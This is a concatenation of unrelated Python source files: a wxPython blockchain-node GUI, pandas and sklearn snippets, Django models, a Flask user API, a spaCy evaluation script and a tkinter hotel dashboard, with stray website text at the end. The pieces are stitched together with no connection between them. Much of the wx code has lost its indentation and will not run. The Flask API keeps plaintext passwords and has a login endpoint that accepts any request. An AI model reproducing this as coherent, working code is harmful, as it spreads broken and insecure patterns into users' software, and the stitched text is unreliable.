trust_node_panel = None
console_panel = None
console_text = ""
def __init__(self):
    # NOTE(review): deliberately does NOT call wx.Frame.__init__; the real
    # frame construction happens later in drow_frame(). Confirm this is safe
    # with the wx version in use.
    return None
def drow_frame(self, parent, id, title):
    """Build the main window: menu bar, welcome/IP labels, trust-node
    controls, start buttons and the console panel (700x350)."""
    wx.Frame.__init__(self, parent, id, title, wx.DefaultPosition, wx.Size(700, 350))
    vbox = wx.BoxSizer(wx.VERTICAL)
    # console
    self.console_panel = wx.Panel(self, -1)
    self.console_text = wx.StaticText(self.console_panel, 9, "Console", (30, 15), (500, 90), style=wx.LEFT)
    # menu
    menubar = wx.MenuBar()
    trx_menu = wx.Menu()
    menubar.Append(trx_menu, '&Send Transaction')
    trx_menu.Append(1, '&Send Data Transaction')
    trx_menu.Append(2, '&Deploy Smart Contract')
    trx_menu.Append(3, '&Run Smart Contract')
    self.Bind(wx.EVT_MENU, self.send_transaction, id=1)
    # NOTE(review): deploy_contract / run_contract handlers are not visible
    # in this chunk -- confirm they exist on MainFrame.
    self.Bind(wx.EVT_MENU, self.deploy_contract, id=2)
    self.Bind(wx.EVT_MENU, self.run_contract, id=3)
    self.SetMenuBar(menubar)
    # Welcome message
    welcome_panel = wx.Panel(self, -1)
    wx.StaticText(welcome_panel, 1, "Welcome to Se-Chain", (30, 15), style=wx.LEFT)
    vbox.Add(welcome_panel, 0, wx.EXPAND)
    # IP address
    ip_panel = wx.Panel(self, -1)
    ip_address = MainController.get_ip_address()
    wx.StaticText(ip_panel, 1, "Your IP Address:" + Property.my_ip_address, (30, 30), style=wx.LEFT)
    vbox.Add(ip_panel, 0, wx.EXPAND)
    # Setting Trust Node Box
    trust_node_box = wx.BoxSizer(wx.HORIZONTAL)
    self.trust_node_panel = wx.Panel(self, -1)
    self.set_trust_node_text()
    trust_node_box.Add(self.trust_node_panel, 0, wx.EXPAND)
    trust_node_text = wx.TextEntryDialog(self, '', 'Setting Trust Node')
    trust_node_text.SetValue("Default")
    trust_node_box.Add(trust_node_text, 0, wx.EXPAND)
    trust_node_button = wx.Button(self, 1, '1. Set Trust Node')
    trust_node_box.Add(trust_node_button, 1, wx.EXPAND)
    vbox.Add(trust_node_box, 0, wx.EXPAND)
    self.Bind(wx.EVT_BUTTON, self.set_trust_node, id=1)
    #start
    start_button = wx.Button(self, 3, "4. Se Chain Start")
    vbox.Add(start_button, 0, wx.EXPAND)
    self.Bind(wx.EVT_BUTTON, self.start_sechain, id=3)
    #start (trust node only)
    trust_start_button = wx.Button(self, 4, "*. Start Trust Node (if this is trust node)")
    vbox.Add(trust_start_button, 0, wx.EXPAND)
    self.Bind(wx.EVT_BUTTON, self.start_trust_node, id=4)
    self.SetSizer(vbox)
    self.Center()
    #console
    vbox.Add(self.console_panel, 1, wx.EXPAND)
def set_trust_node_text(self):
    """Render the currently configured trust-node IP on the trust-node panel."""
    from SeChainController import Property
    my_ip = Property.trust_node_ip
    # NOTE(review): a new StaticText is created on every call rather than
    # updating the existing label -- repeated calls overlay text.
    wx.StaticText(self.trust_node_panel, 1, "TrustNode : " + my_ip, (30, 30), style=wx.LEFT)
def set_trust_node(self, event):
from SeChainController import Property
dlg = wx.TextEntryDialog(self, '', 'Setting Trust Node')
dlg.SetValue(Property.trust_node_ip)
if dlg.ShowModal() == wx.ID_OK:
# need to validation check (IP format)
Property.trust_node_ip = dlg.GetValue()
self.set_trust_node_text()
dlg.Destroy()
self.write_console("Trust node is set")
    def write_console(self, message):
        # Show *message* in the console label of the main UI frame.
        # NOTE(review): goes through the global Property.ui_frame rather than
        # self.console_text — presumably Property.ui_frame is this frame; confirm.
        Property.ui_frame.console_text.SetLabel(message)
def start_sechain(self, event):
# import thread
# thread.start_new_thread(MainController.initiate_node(), ("start_main_controller", 1))
MainController.initiate_node()
def start_trust_node(self, event):
print "My_ip : " + Property.my_ip_address
print "Trust_ip : " + Property.trust_node_ip
if Property.my_ip_address == Property.trust_node_ip :
self.write_console("start trust node")
MainController.node_start()
else:
self.write_console("This IP and trust node IP is not same")
def send_transaction(self, event):
if (Property.node_started == True):
trx_drg = wx.Dialog(None, title='Sending Transaction')
trx_drg.SetSize((500, 300))
trx_drg.SetTitle('Sending Transaction')
pnl = wx.Panel(trx_drg)
vbox = wx.BoxSizer(wx.VERTICAL)
wx.StaticText(pnl, 1, 'Receiver address', (5, 5), style=wx.LEFT)
receiver_text = wx.TextCtrl(pnl, pos = (5, 25))
wx.StaticText(pnl, 2, 'Amount', (5, 60), style=wx.LEFT)
amount_text = wx.TextCtrl(pnl, pos = (5, 80))
wx.StaticText(pnl, 3, 'Message', (5, 120), style=wx.LEFT)
message_text = wx.TextCtrl(pnl, pos = (5, 140), size = (200, 25))
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(trx_drg, wx.ID_OK)
hbox2.Add(okButton)
vbox.Add(pnl, proportion=1, flag=wx.ALL | wx.EXPAND, border=5)
vbox.Add(hbox2, flag=wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM, border=10)
trx_drg.SetSizer(vbox)
if trx_drg.ShowModal() == wx.ID_OK:
from SeChainController import FunctionAPIs
# need to validation check (IP format)
FunctionAPIs.send_transaction(receiver_text.GetValue(), amount_text.GetValue(), message_text.GetValue())
trx_drg.Destroy()
else:
print "Node is not started, Start node first"
self.write_console("Node is not started, Start node first")
def deploy_contract(self, event):
if (Property.node_started == True):
trx_drg = wx.Dialog(None, title='Deploying Contract')
trx_drg.SetSize((500, 400))
trx_drg.SetTitle('Sending Transaction')
pnl = wx.Panel(trx_drg)
vbox = wx.BoxSizer(wx.VERTICAL)
wx.StaticText(pnl, 1, 'Receiver address', (5, 5), style=wx.LEFT)
receiver_text = wx.TextCtrl(pnl, pos = (5, 25))
wx.StaticText(pnl, 2, 'Amount', (5, 60), style=wx.LEFT)
amount_text = wx.TextCtrl(pnl, pos = (5, 80))
wx.StaticText(pnl, 3, 'Message', (5, 120), style=wx.LEFT)
message_text = wx.TextCtrl(pnl, pos = (5, 140), size = (200, 25))
wx.StaticText(pnl, 4, 'Source File (ex : Addition)', (5, 180), style=wx.LEFT)
source_text = wx.TextCtrl(pnl, pos = (5, 200), size = (200, 25))
wx.StaticText(pnl, 4, 'Arguments (split by ' ', ex : 1 b)', (5, 240), style=wx.LEFT)
arg_text = wx.TextCtrl(pnl, pos=(5, 260), size=(200, 25))
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(trx_drg, wx.ID_OK)
hbox2.Add(okButton)
vbox.Add(pnl, proportion=1, flag=wx.ALL | wx.EXPAND, border=5)
vbox.Add(hbox2, flag=wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM, border=10)
trx_drg.SetSizer(vbox)
if trx_drg.ShowModal() == wx.ID_OK:
from SeChainController import FunctionAPIs
contract_source = {'source': source_text.GetValue(), 'args': arg_text.GetValue()}
trx_json = FunctionAPIs.deploy_contract(Property.myNode['public_key'],
Property.myNode['private_key'],
'CT',
receiver_text.GetValue(),
amount_text.GetValue(),
message_text.GetValue(),
contract_source)
trx_drg.Destroy()
else:
print "Node is not started, Start node first"
self.write_console("Node is not started, Start node first")
def run_contract(self, event):
if (Property.node_started == True):
trx_drg = wx.Dialog(None, title='Run Contract')
trx_drg.SetSize((500, 450))
trx_drg.SetTitle('Sending Transaction')
pnl = wx.Panel(trx_drg)
vbox = wx.BoxSizer(wx.VERTICAL)
wx.StaticText(pnl, 1, 'Receiver IP', (5, 5), style=wx.LEFT)
receiver_text = wx.TextCtrl(pnl, pos=(5, 25))
wx.StaticText(pnl, 2, 'Amount', (5, 60), style=wx.LEFT)
amount_text = wx.TextCtrl(pnl, pos=(5, 80))
wx.StaticText(pnl, 3, 'Message', (5, 120), style=wx.LEFT)
message_text = wx.TextCtrl(pnl, pos=(5, 140), size=(200, 25))
wx.StaticText(pnl, 4, 'Contract Address', (5, 180), style=wx.LEFT)
address_text = wx.TextCtrl(pnl, pos=(5, 200), size=(200, 25))
wx.StaticText(pnl, 5, 'Function Name', (5, 240), style=wx.LEFT)
function_text = wx.TextCtrl(pnl, pos=(5, 260), size=(200, 25))
wx.StaticText(pnl, 6, 'Arguments (split by ' ', ex : 1 b)', (5, 300), style=wx.LEFT)
arg_text = wx.TextCtrl(pnl, pos=(5, 320), size=(200, 25))
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(trx_drg, wx.ID_OK)
hbox2.Add(okButton)
vbox.Add(pnl, proportion=1, flag=wx.ALL | wx.EXPAND, border=5)
vbox.Add(hbox2, flag=wx.ALIGN_CENTER | wx.TOP | wx.BOTTOM, border=10)
trx_drg.SetSizer(vbox)
if trx_drg.ShowModal() == wx.ID_OK:
from SeChainController import FunctionAPIs
contract_data = {'contractAddr': address_text.GetValue(),
'function': function_text.GetValue(),
'args': arg_text.GetValue()}
trx_json = FunctionAPIs.run_contract(Property.myNode['public_key'],
Property.myNode['private_key'],
'RT',
receiver_text.GetValue(),
amount_text.GetValue(),
message_text.GetValue(),
contract_data)
trx_drg.Destroy()
else:
print "Node is not started, Start node first"
self.write_console("Node is not started, Start node first") |
import pandas as pd
# Load the UCI bank-marketing dataset (semicolon-separated) and preview rows.
# NOTE(review): hard-coded local Windows paths — adjust per machine.
df = pd.read_csv("C:/bank-additional-full.csv", sep=";")
df2 = df[:30]
print(df2)
print(type(df2))
# NOTE(review): the column is addressed as '"job"' with literal quotes —
# presumably the CSV header kept its quote characters; confirm against the file.
df3 = df2['"job"']
###Simple test###
import pandas as pd
df4 = pd.DataFrame({'cid':['c01', 'c02', 'c03'], 'time': [43, 543, 34]})
print(df4)
print(df4['time'])
print(type(df4))
### Iris ###
import pandas as pd
# Traditional-Chinese iris CSV: four measurement columns plus a species label.
csv = pd.read_csv("C:/Users/Sean/Downloads/iris.csv", encoding="big5")
print(csv.head())
from sklearn.tree import DecisionTreeClassifier
# Fit a depth-limited decision tree on the measurements to predict species.
tree = DecisionTreeClassifier(criterion='entropy', max_depth=5)
tree_result = tree.fit(csv[['花萼長度', '花萼寬度', '花瓣長度', '花瓣寬度']], csv[['屬種']])
print(tree_result)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from json_field import JSONField
from django.db import models
from util.randz import make_8_key
class Discharge(models.Model):
    """A hospital discharge record tied to a patient and, optionally, doctors."""
    # Short unique identifier; generated in save() when left blank.
    uuid = models.CharField(blank=True, unique=True, max_length=50)
    # Message
    date = models.DateTimeField(null=True, blank=True)
    facility = models.CharField(max_length=100, null=True, blank=True)
    diagnosis = models.CharField(max_length=50, null=True, blank=True)
    # Patient
    patient = models.ForeignKey('patient.Patient')
    # Arbitrary extra data attached to the message.
    metadata = JSONField(null=True, blank=True)
    # Doctors
    attending = models.ForeignKey('provider.Provider', related_name="attending", null=True, blank=True)
    referring = models.ForeignKey('provider.Provider', related_name="referring", null=True, blank=True)
    def __unicode__(self):
        # NOTE(review): date is nullable (null=True); strftime would raise on
        # None — confirm discharges always carry a date before display.
        return u"{} ({})".format(
            self.patient,
            self.date.strftime("%m/%d/%y"))
    def save(self, *args, **kwargs):
        """
        Ensure unique uuid
        """
        # Draw 8-char keys until one is unused. Small race window between the
        # existence check and the INSERT; the unique constraint is the backstop.
        if not self.uuid:
            uuid = make_8_key()
            while Discharge.objects.filter(uuid=uuid).exists():
                uuid = make_8_key()
            self.uuid = uuid
        super(Discharge, self).save(*args, **kwargs)
|
# -*- coding: utf-8 -*-
def is_new_ip(c_key, cache, ip):
    """Check whether *ip* is absent from the cached IP pool stored under *c_key*.

    Returns a (ip_new, pool) pair: ip_new is False only when the cached value
    is a non-empty set that already contains *ip*; pool is the cached value
    itself, or a fresh empty set when nothing (or a falsy value) was cached.
    """
    pool = cache.get(c_key)
    if pool and isinstance(pool, set):
        is_new = ip not in pool
    else:
        # Missing, falsy, or non-set cache entries always count as "new".
        is_new = True
    return is_new, pool if pool else set()
|
from flask import Flask
from flask_restful import Resource, Api
from flask_restful import reqparse
from flask import json
app = Flask(__name__)
api = Api(app)
# Request parser shared by all resources: credential fields from the body,
# plus an optional 'userArg' query-string parameter (used by DELETE /users).
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('passWord')
parser.add_argument('userArg', location='args')
class User(object):
    """Plain in-memory record of a registered user.

    Instances are serialized to JSON via __dict__ by the REST resources.
    """
    def __init__(self, userId, userName, passWord, roleId):
        self.roleId = roleId
        self.userId = userId
        self.userName = userName
        self.passWord = passWord
# Module-level in-memory store of User objects (no persistence).
userList = []
class UserResource(Resource):
    """REST resource exposing the in-memory user list at /users."""
    def get(self):
        """Return every user, serialized via its attribute dict."""
        return [user.__dict__ for user in userList]
    def post(self):
        """Create a user from the parsed request fields and return it.

        userId and roleId are hard-coded placeholders (always 1).
        """
        args = parser.parse_args()
        user = User(1, args['userName'], args['passWord'], 1)
        userList.append(user)
        return user.__dict__
    def delete(self):
        """Remove the first user whose name matches the 'userArg' query param."""
        args = parser.parse_args()
        userName = args['userArg']
        for user in userList:
            if user.userName == userName:
                # remove() replaces the original del userList[userList.index(user)];
                # the loop breaks immediately, so mutating during iteration is safe.
                userList.remove(user)
                break
class Login(Resource):
    """Stub login endpoint: accepts any POST and reports success."""
    def post(self):
        result = {'success': True}
        return result
# Route registration and dev-server entry point.
api.add_resource(Login, '/login')
api.add_resource(UserResource, '/users')
if __name__ == '__main__':
    app.run(debug=True, port=5001)
|
import json
import spacy
from test_set_with_placeholder import test_with_placeholder
from test_set_with_placeholder import test_with_placeholder_name_and_surname
from test_set_with_placeholder import test_with_placeholder_common_word
def get_ground_truths(text, ents):
    """Return the deduplicated, lower-cased gold entity strings in *text*.

    *ents* is a dict whose 'entities' value is a list of
    (start, end, label) triples of character offsets into *text*.
    """
    spans = {text[start:end].lower() for start, end, _ in ents['entities']}
    return list(spans)
def get_real_value(start, end, text, ents, label_text):
    """Return the gold text for the span (start, end), lower-cased.

    Scans the gold annotations in *ents* for an exact span match; falls back
    to *label_text* when no annotation covers exactly this span.
    """
    for gold_start, gold_end, _ in ents['entities']:
        if (gold_start, gold_end) == (start, end):
            return text[start:end].lower()
    return label_text
def get_ents_text(doc_ents, text, ents):
    """Resolve predicted spaCy entities to their gold text where spans match.

    Each predicted entity contributes its gold annotation text (via
    get_real_value) when its character span matches a gold span, otherwise
    its own lower-cased predicted text. Duplicates are removed.
    """
    resolved = {
        get_real_value(ent.start_char, ent.end_char, text, ents, ent.text.lower())
        for ent in doc_ents
    }
    return list(resolved)
if __name__ == '__main__':
    try:
        # Per-document precision/recall lists (feed the "micro" averages below).
        precisions = []
        recalls = []
        # Corpus-wide counts accumulated across all documents ("macro" below).
        true_positives = 0
        false_positives = 0
        false_negatives = 0
        # NOTE(review): hard-coded local model/test-set paths — adjust per machine.
        nlp = spacy.load('/home/marco/Scrivania/tirocinio-unicredit/news/final_attempt/training_data/sector/model/model-best/')
        evaluation_set = test_with_placeholder_common_word(json.load(open('/home/marco/Scrivania/tirocinio-unicredit/news/final_attempt/training_data/sector/test.json')))
        c = 0
        len_ev_set = len(evaluation_set)
        for _, text, ents, pl_text in evaluation_set:
            c += 1
            print(f"evaluation: {c}/{len_ev_set}")
            # Per-document counters.
            true_positive = 0
            false_positive = 0
            false_negative = 0
            ground_truths = get_ground_truths(text, ents)
            doc = nlp(pl_text)
            doc_ents = get_ents_text(doc.ents, text, ents)
            # Documents with no predicted entities are skipped entirely —
            # they contribute to neither the micro nor the macro counts.
            if len(doc_ents) == 0:
                continue
            # Predictions present in the gold set are TPs, otherwise FPs.
            for doc_ent in doc_ents:
                if doc_ent in ground_truths:
                    true_positive += 1
                    true_positives += 1
                else:
                    false_positive += 1
                    false_positives += 1
            # Gold entities never predicted are FNs.
            for gt_ent in ground_truths:
                if gt_ent not in doc_ents:
                    false_negative += 1
                    false_negatives += 1
            precision = true_positive / (true_positive + false_positive)
            recall = true_positive / (true_positive + false_negative)
            precisions.append(precision)
            recalls.append(recall)
        micro_precision = sum(precisions) / len(precisions) # average of precision of each document
        micro_recall = sum(recalls) / len(recalls) # average of recall of each document
        micro_f_measure = (2 * micro_precision * micro_recall) / (micro_precision + micro_recall)
        macro_precision = true_positives / (true_positives + false_positives) # precision consider all like one big document
        macro_recall = true_positives / (true_positives + false_negatives) # recall consider all like one big document
        macro_f_measure = (2 * macro_precision * macro_recall) / (macro_precision + macro_recall)
        print(f"Micro - Precision: {round(micro_precision * 100, 1)}% - Recall: {round(micro_recall * 100, 1)}% - F1 Measure: {round(micro_f_measure * 100, 1)}%")
        print(f"Macro - Precision: {round(macro_precision * 100, 1)}% - Recall: {round(macro_recall * 100, 1)}% - F1 Measure: {round(macro_f_measure * 100, 1)}%")
    except ZeroDivisionError as e:
        # NOTE(review): any zero denominator (e.g. a document with no TPs and
        # no FPs) silently aborts the whole run with a blank line — consider
        # reporting the exception instead of swallowing it.
        print()
|
from __future__ import unicode_literals
from django.db import models
# Create your models here.
from django.db import models
class Teacher(models.Model):
    """A teacher with contact details and office information."""
    first_name=models.CharField(max_length=30)
    last_name=models.CharField(max_length=30)
    office_details=models.CharField(max_length=60)
    phone=models.CharField(max_length=20)
    email=models.EmailField()
class Student(models.Model):
    """A student identified by name and email."""
    first_name=models.CharField(max_length=30)
    last_name=models.CharField(max_length=30)
    email=models.EmailField()
class Course(models.Model):
    """A course taught by one teacher and attended by many students."""
    name=models.CharField(max_length=30)
    code=models.CharField(max_length=60)
    classroom=models.CharField(max_length=30)
    times=models.TimeField()
    students=models.ManyToManyField(Student)
    # NOTE(review): no on_delete argument — this only works on Django < 2.0,
    # consistent with the style of the rest of this file; confirm the target version.
    teacher=models.ForeignKey(Teacher)
|
from tkinter import *
import datetime
from folderfinder import findfolder
# Resolve the hotel data folder before the remaining imports (original order kept).
hotelfolder = findfolder()
import ctypes
import json
# Size the main window to 20% x 40% of the primary screen via the Win32 API
# (this script is Windows-only: ctypes.windll and backslash paths below).
user32 = ctypes.windll.user32
screensizex = int(0.2*user32.GetSystemMetrics(0))
screensizey= int(0.4*user32.GetSystemMetrics(1))
root = Tk()
root.geometry(str(screensizex)+"x"+str(screensizey)), root.title('Hotel')
# Single label that hotelstats() continually refreshes with live figures.
lab = Label(root)
lab.config(text='welcome',font = ('Helvetica',40))
def normalconfig():
    """Reset the main label to a plain yellow background with a small font."""
    lab.config(background='yellow', font=('Helvetica', 10))
def hotelstats():
    """Refresh the main label with live hotel statistics, then reschedule.

    Reads hoteldata.json from the hotel folder, renders room availability
    and revenue figures into the label, and re-arms itself every 3 seconds
    via root.after.
    """
    # The 'with' block closes the file; the original also called f.close()
    # redundantly inside it.
    with open(hotelfolder + '\\' + 'hoteldata.json', 'r') as f:
        hoteldata = json.load(f)
    normalavb = hoteldata['normalroomsavb']
    suiteavb = hoteldata['suitesavb']
    luxavb = hoteldata['luxurysuitesavb']
    totalrooms = hoteldata['totalrooms']
    totalroomsavb = normalavb + suiteavb + luxavb
    totalnormal = hoteldata['normalrooms']
    totalsuite = hoteldata['suites']
    totallux = hoteldata['luxurysuites']
    revenue = hoteldata['revenue']
    weekrevenue = hoteldata['lastweekrev']
    # The original passed (revenue, weekrevenue) into the last two slots,
    # showing 'revenue' under "last week's revenue" and 'lastweekrev' under
    # "total revenue" — swapped relative to the JSON keys. Fixed here.
    livedata = ('''
    total rooms: {0}
    total rooms available: {1}
    normal rooms: {2}
    normal rooms available: {3}
    suites: {4}
    suites available: {5}
    luxury suites: {6}
    luxury suites available: {7}
    last week's revenue: {8}
    total revenue: {9} '''.format(totalrooms, totalroomsavb, totalnormal,
                                  normalavb, totalsuite, suiteavb, totallux,
                                  luxavb, weekrevenue, revenue))
    lab.config(text=livedata,
               background='Blue',
               font=('Helvetica', 20),
               anchor='e')
    lab.pack(side=RIGHT, expand=YES, fill=BOTH)
    root.after(3000, hotelstats)
# Application menu with a single Exit cascade.
menu = Menu()
# NOTE(review): 'exit' shadows the builtin exit(); harmless here but worth renaming.
exit = Menu(menu)
exit.add_command(label='Exit', command=root.quit)
menu.add_cascade(label= 'Exit', menu= exit)
# run first time
hotelstats()
root.mainloop()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.